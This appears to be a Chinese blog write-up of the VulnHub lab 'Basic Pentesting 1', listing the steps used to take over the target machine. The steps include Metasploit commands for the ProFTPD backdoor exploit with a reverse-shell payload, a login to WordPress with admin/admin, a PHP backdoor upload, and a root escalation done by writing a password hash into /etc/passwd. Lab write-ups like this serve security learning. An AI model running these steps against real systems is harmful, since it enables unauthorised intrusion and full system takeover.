zoukankan      html  css  js  c++  java
  • BASIC-PENTESTING-1 靶机提权

    basic-pentesting-1

    https://www.vulnhub.com/entry/basic-pentesting-1,216/

    获取ip地址

    端口扫描,服务识别

    根据服务版本搜索相关漏洞

    通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有

    于是使用msf 搜索漏洞模块并利用

    use exploit/unix/ftp/proftpd_133c_backdoor

    set rhosts 192.168.88.197

    set lhost 192.168.88.174

    set payload cmd/unix/reverse

    exploit

    直接获得root权限。

    当然还有一个80端口,我们也可以尝试从web去突破

    尝试发现一些目录

    dirb http://192.168.88.197

    在目录/secret/ 下是wordpress 网站

    尝试访问,发现存在页面重定向

    将网站ip 域名 写入本地hosts 文件,重新访问网站

    熟悉的界面

    直接进入后台登录界面

    直接admin、admin 弱口令进入后台管理界面,免去了爆破的麻烦!

    在获得访问权限的前提下通过msf 上传 shellcode

    use exploit/unix/webapp/wp_admin_shell_upload

    set lhost 192.168.88.174

    set rhost 192.168.88.197

    set targeturi /secret/

    set username admin

    set password admin

    exploit

    可以看到成功上传了php后门,并获得web权限

    接下来提权

    可以使用linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py

    具体细节可以参考:https://www.freebuf.com/articles/system/129549.html

    meterpreter > edit /etc/passwd meterpreter 下的edit 类似vim ,并且我们可以编辑/etc/psswd

    root:x:0:0:root:/root:/bin/bash 第二位x 是密码占位符,密码加密存储在/etc/shadow,

    我们可以假设,此处x 位 密码存在,那么root 就会默认密码为x位。就不会去读取/etc/shadow.

    生成密码

    openssl passwd -1

    密码:admin

    $1$ke/.AFq7$ykvmZ9loFhFpsOCZfJ84q1

    用生成的密码替换 root的密码

    :wq! 保存

    shell

    进入完整性shell

    python -c ‘import pty; pty.spawn(“/bin/bash”)’

    su root

    输入密码 admin

    获取root权限

    个人博客:www.payload.com.cn

  • 相关阅读:
    前端 JavaScript&Dom
    前端 css续
    前端 初级篇(CSS)
    前端 初级篇(HTML)
    堡垒机
    Python操作RabbitMQ
    常用到代码片段
    关于文件上传功能的思考
    JS正则表达式将url转成json格式
    一行代码解决各种IE兼容问题,IE6,IE7,IE8,IE9,IE10
  • 原文地址:https://www.cnblogs.com/micr067/p/12519764.html
Copyright © 2011-2022 走看看